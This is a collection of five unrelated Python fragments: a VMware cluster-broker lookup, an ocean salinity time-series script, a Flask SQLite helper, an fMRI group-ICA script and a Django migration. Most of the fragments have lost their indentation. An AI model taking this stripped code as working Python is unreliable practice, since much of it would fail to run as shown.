instance used to find the cluster information.
:rtype: tuple
"""
required = [
RequestKey.CLUSTER_NAME
]
req_utils.validate_payload(request_data, required)
org_name = request_data.get(RequestKey.ORG_NAME)
ovdc_name = request_data.get(RequestKey.OVDC_NAME)
if ovdc_name is not None and org_name is not None:
k8s_metadata = \
ovdc_utils.get_ovdc_k8s_provider_metadata(org_name=org_name,
ovdc_name=ovdc_name,
include_credentials=True,
include_nsxt_info=True)
broker = get_broker_from_k8s_metadata(k8s_metadata, tenant_auth_token)
return broker.get_cluster_info(request_data), broker
return get_cluster_and_broker(request_data, tenant_auth_token)
def get_cluster_and_broker(request_data, tenant_auth_token):
cluster_name = request_data[RequestKey.CLUSTER_NAME]
vcd_broker = VcdBroker(tenant_auth_token)
try:
return vcd_broker.get_cluster_info(request_data), vcd_broker
except ClusterNotFoundError as err:
# continue searching using PksBrokers
LOGGER.debug(f"{err}")
except CseDuplicateClusterError as err:
# fail because multiple clusters with same name exist
# only case is when multiple same-name clusters exist across orgs
# and sys admin tries to do a cluster operation
LOGGER.debug(f"{err}")
raise
except Exception as err:
LOGGER.error(f"Unknown error: {err}", exc_info=True)
raise
pks_ctx_list = \
create_pks_context_for_all_accounts_in_org(tenant_auth_token)
for pks_ctx in pks_ctx_list:
debug_msg = f"Get cluster info for cluster '{cluster_name}' " \
f"failed on host '{pks_ctx['host']}' with error: "
pks_broker = PksBroker(pks_ctx, tenant_auth_token)
try:
return pks_broker.get_cluster_info(request_data), pks_broker
except (PksClusterNotFoundError, PksServerError) as err:
# continue searching using other PksBrokers
LOGGER.debug(f"{debug_msg}{err}")
except PksDuplicateClusterError as err:
# fail because multiple clusters with same name exist
LOGGER.debug(f"{debug_msg}{err}")
raise
except Exception as err:
LOGGER.error(f"Unknown error: {err}", exc_info=True)
raise
# only raised if cluster was not found in VcdBroker or PksBrokers
raise ClusterNotFoundError(f"Cluster '{cluster_name}' not found.")
def get_broker_from_k8s_metadata(k8s_metadata, tenant_auth_token):
"""Get broker from ovdc k8s metadata.
If PKS is not enabled, always return VcdBroker
If PKS is enabled
if no ovdc metadata exists or k8s provider is None, raise server error
else return the broker according to ovdc k8s provider
"""
if utils.is_pks_enabled():
if not k8s_metadata or k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.NONE: # noqa: E501
raise CseServerError("Org VDC is not enabled for Kubernetes "
"cluster deployment")
if k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.PKS:
return PksBroker(k8s_metadata, tenant_auth_token)
if k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.NATIVE:
return VcdBroker(tenant_auth_token)
return VcdBroker(tenant_auth_token)
|
"""
A tool to extract hourly time series of salinity and volume in the segments.
Now also gets parts of a variance budget.
Performance: takes 1.5 sec per save (3.6 hours per year) on my mac. This relies
on creating i_dict and j_dict of indices used for fancy indexing in the segment loop.
The alternate version takes about 15 times longer.
"""
# imports
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pandas as pd
import netCDF4 as nc
import argparse
from datetime import datetime, timedelta
import os, sys
sys.path.append(os.path.abspath('../alpha'))
import Lfun
import zrfun
import tef_fun
import flux_fun
from time import time
# get command line arguments (argparse is already imported above)
parser = argparse.ArgumentParser()
# standard arguments
parser.add_argument('-g', '--gridname', nargs='?', type=str, default='cas6')
parser.add_argument('-t', '--tag', nargs='?', type=str, default='v3')
parser.add_argument('-x', '--ex_name', nargs='?', type=str, default='lo8b')
parser.add_argument('-0', '--date_string0', nargs='?', type=str, default='2019.07.04')
parser.add_argument('-1', '--date_string1', nargs='?', type=str, default='2019.07.04')
args = parser.parse_args()
# Get Ldir
Ldir = Lfun.Lstart(args.gridname, args.tag)
Ldir['gtagex'] = Ldir['gtag'] + '_' + args.ex_name
# get time limits
ds0 = args.date_string0; ds1 = args.date_string1
Ldir['date_string0'] = ds0; Ldir['date_string1'] = ds1
dt0 = datetime.strptime(ds0, '%Y.%m.%d'); dt1 = datetime.strptime(ds1, '%Y.%m.%d')
ndays = (dt1-dt0).days + 1
print('Working on:')
outname = Ldir['gtagex'] + '_' + ds0 + '_' + ds1
print(outname +'\n')
# get list of history files to process
fn_list = Lfun.get_fn_list('hourly', Ldir, ds0, ds1)
NT = len(fn_list)
# get grid info
fn = fn_list[0]
G = zrfun.get_basic_info(fn, only_G=True)
S = zrfun.get_basic_info(fn, only_S=True)
h = G['h']
DA = G['DX'] * G['DY']
DA3 = DA.reshape((1,G['M'],G['L']))
DXu = (G['DX'][:,1:]+G['DX'][:,:-1])/2
DX3u = DXu.reshape((1,G['M'],G['L']-1))
DYv = (G['DY'][1:,:]+G['DY'][:-1,:])/2
DY3v = DYv.reshape((1,G['M']-1,G['L']))
# set input/output location
indir0 = Ldir['LOo'] + 'tef2/'
voldir = indir0 + 'volumes_' + Ldir['gridname'] + '/'
#
outdir0 = indir0 + outname + '/'
Lfun.make_dir(outdir0)
outdir = outdir0 + 'flux/'
Lfun.make_dir(outdir)
# load DataFrame of volume and associated dicts
v_df = pd.read_pickle(voldir + 'volumes.p')
bathy_dict = pickle.load(open(voldir + 'bathy_dict.p', 'rb'))
ji_dict = pickle.load(open(voldir + 'ji_dict.p', 'rb'))
seg_list = list(v_df.index)
testing = False
if testing:
verbose = True
seg_list = seg_list[-2:]
else:
verbose = False
j_dict = {}; i_dict = {}
for seg_name in seg_list:
jj = []; ii = []
ji_list_full = ji_dict[seg_name]
for ji in ji_list_full:
jj.append(ji[0])
ii.append(ji[1])
jjj = np.array(jj)
iii = np.array(ii)
j_dict[seg_name] = jjj
i_dict[seg_name] = iii
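# j_dict/i_dict hold each segment's cell indices as plain integer arrays so
# that, in the hourly loop below, a segment's water columns can be pulled out
# with one fancy-indexing call (e.g. salt[:, jjj, iii]); this precomputation
# is what the header docstring credits for the large speedup over the
# alternate version.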
s_df = pd.DataFrame(columns=seg_list)
s2_df = pd.DataFrame(columns=seg_list)
mix_df = pd.DataFrame(columns=seg_list)
hmix_df = pd.DataFrame(columns=seg_list)
v_df = pd.DataFrame(columns=seg_list)
for fn in fn_list:
tt0 = time()
print(fn)
ds = nc.Dataset(fn)
salt = ds['salt'][0,:,:,:]
AKs = ds['AKs'][0,:,:,:]
KH = float(ds['nl_tnu2'][0].data)
zeta = ds['zeta'][0,:,:]
ot = ds['ocean_time'][:]
ds.close()
# calculate horizontal salinity gradient for hmix
sx2 = np.square(np.diff(salt,axis=2)/DX3u)
SX2 = 0*salt
SX2[:,:,1:-1] = (sx2[:,:,1:]+sx2[:,:,:-1])/2
sy2 = np.square(np.diff(salt,axis=1)/DY3v)
SY2 = 0*salt
SY2[:,1:-1,:] = (sy2[:,1:,:]+sy2[:,:-1,:])/2
dt = Lfun.modtime_to_datetime(ot.data[0])
# find the volume and volume-mean salinity
for seg_name in seg_list:
jjj = j_dict[seg_name]
iii = i_dict[seg_name]
z_r, z_w = zrfun.get_z(h[jjj,iii], zeta[jjj,iii], S)
dz = np.diff(z_w, axis=0)
dzr = np.diff(z_r, axis=0)
DV = dz * DA3[0,jjj,iii]
DVR = dzr * DA3[0,jjj,iii]
volume = DV.sum()
net_salt = (salt[:,jjj,iii] * DV).sum()
mean_salt = net_salt/volume
net_salt2 = (salt[:,jjj,iii] * salt[:,jjj,iii] * DV).sum()
mean_salt2 = net_salt2/volume
dsdz = (salt[1:,jjj,iii] - salt[:-1,jjj,iii])/dzr
mix = -2*(AKs[1:-1,jjj,iii] * dsdz * dsdz * DVR).sum()
hmix = -2 * KH * ((SX2[:,jjj,iii] + SY2[:,jjj,iii]) * DV).sum()
# store results
s_df.loc[dt, seg_name] = mean_salt
s2_df.loc[dt, seg_name] = mean_salt2
mix_df.loc[dt, seg_name] = mix
hmix_df.loc[dt, seg_name] = hmix
v_df.loc[dt, seg_name] = volume
if verbose:
print('%3s: Mean Salinity = %0.4f, Volume = %0.4f km3' %
(seg_name, mean_salt, volume/1e9))
print('%3s: Mean Salinity Squared = %0.4f, Volume = %0.4f km3' %
(seg_name, mean_salt2, volume/1e9))
print(' ** took %0.1f sec' % (time()-tt0))
sys.stdout.flush()
s_out_fn = outdir + 'hourly_segment_salinity.p'
s2_out_fn = outdir + 'hourly_segment_salinity2.p'
mix_out_fn = outdir + 'hourly_segment_mix.p'
hmix_out_fn = outdir + 'hourly_segment_hmix.p'
v_out_fn = outdir + 'hourly_segment_volume.p'
s_df.to_pickle(s_out_fn)
s2_df.to_pickle(s2_out_fn)
mix_df.to_pickle(mix_out_fn)
hmix_df.to_pickle(hmix_out_fn)
v_df.to_pickle(v_out_fn)
|
import os
import sqlite3
from flask import g, current_app
from collections import namedtuple
import logging
UserEntry = namedtuple('UserEntry', 'user_id,user_name,password')
def init_db():
    db = get_db()
    try:
        with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
                               'db.sql')) as f:
            sql = f.read()
        db.executescript(sql)
    except (sqlite3.OperationalError, OSError) as oe:
        # 'already exists' means the schema was created on an earlier run.
        if 'already exists' not in str(oe):
            logging.error("Could not load the .sql schema; creating the db "
                          "with a predefined schema instead.\nError trace: {0}"
                          .format(str(oe)))
            # executescript() is required here: the fallback contains several
            # statements and sqlite3's execute() runs only one at a time.
            db.executescript("""CREATE TABLE users( user_id INTEGER PRIMARY KEY,
            user_name text, password text); CREATE TABLE message( id INTEGER
            PRIMARY KEY, sender text, receiver text, message text, subject
            text, date date, unread INTEGER);""")
    db.commit()
def get_db():
if 'db' not in g:
g.db = sqlite3.connect(current_app.config['DATABASE'])
return g.db
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def del_query_db(query, args=()):
get_db().execute(query, args)
get_db().commit()
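# A minimal teardown sketch (not part of the original module; it assumes the
# Flask app factory registers it via app.teardown_appcontext(close_db)):
# closes the per-request connection opened by get_db().
def close_db(e=None):
    db = g.pop('db', None)
    if db is not None:
        db.close()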
|
import argparse
import os
from meshica import migp
from niio import loaded
import numpy as np
import scipy.io as sio
parser = argparse.ArgumentParser()
parser.add_argument('-files',
'--file-list',
help='List of resting-state files to aggregate.',
required=True,
type=str)
parser.add_argument('-c',
'--number-components',
help='Number of ICA components to compute.',
required=False,
type=int,
default=20)
parser.add_argument('-lp',
'--low-pass',
help='Low pass filter frequency.',
required=False,
type=float,
default=None)
parser.add_argument('-tr',
'--rep-time',
help='Repetition time (TR) in seconds.',
required=False,
type=float,
default=0.720)
parser.add_argument('-e',
'--eigens',
                    help='Number of principal components to iteratively keep.',
required=False,
type=int,
default=3600)
parser.add_argument('-n',
'--number-subjects',
help='Number of subjects to initialize components with.',
required=False,
type=int,
default=4)
parser.add_argument('-o',
'--output',
help='Output file name for group ICA components.',
required=True,
type=str)
parser.add_argument('-m',
'--mask',
help='Inclusion mask for vertices.',
required=False,
type=str,
default=None)
parser.add_argument('-s',
'--size',
help='Downsample the number of files.',
required=False,
type=int,
default=None)
args = parser.parse_args()
with open(args.file_list, 'r') as f:
files = f.read().split()
np.random.shuffle(files)
if args.size:
files = files[:args.size]
mask = None
if args.mask:
    mask = loaded.load(args.mask)
print('Fitting MIGP with {:} components...'.format(args.number_components))
M = migp.MIGP(n_components=args.number_components,
low_pass=args.low_pass,
m_eigen=args.eigens,
s_init=args.number_subjects,
t_r=args.rep_time,
mask=mask)
M.fit(files)
components = M.components_
if args.mask:
    # map the masked components back onto the full set of vertices
    C = np.zeros((mask.shape[0], components.shape[1]))
    C[np.where(mask)[0], :] = components
    components = {'components': C}
else:
components = {'components': components}
print('Saving gICA components...')
sio.savemat(file_name=args.output, mdict=components)
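# Example invocation (a sketch; the script and file names are placeholders,
# the flags are those defined by the argparse setup above):
#   python run_migp.py -files rest_scans.txt -c 25 -tr 0.72 \
#       -m cortex_mask.func.gii -o group_ica_components.mat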
|
# Generated by Django 2.1.4 on 2019-09-05 23:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_card'),
]
operations = [
migrations.AlterField(
model_name='card',
name='binNum',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='card',
name='nextReviewAt',
field=models.DateTimeField(blank=True, default=None, null=True),
),
migrations.AlterField(
model_name='card',
name='wrongCount',
field=models.IntegerField(blank=True, default=0),
),
]
|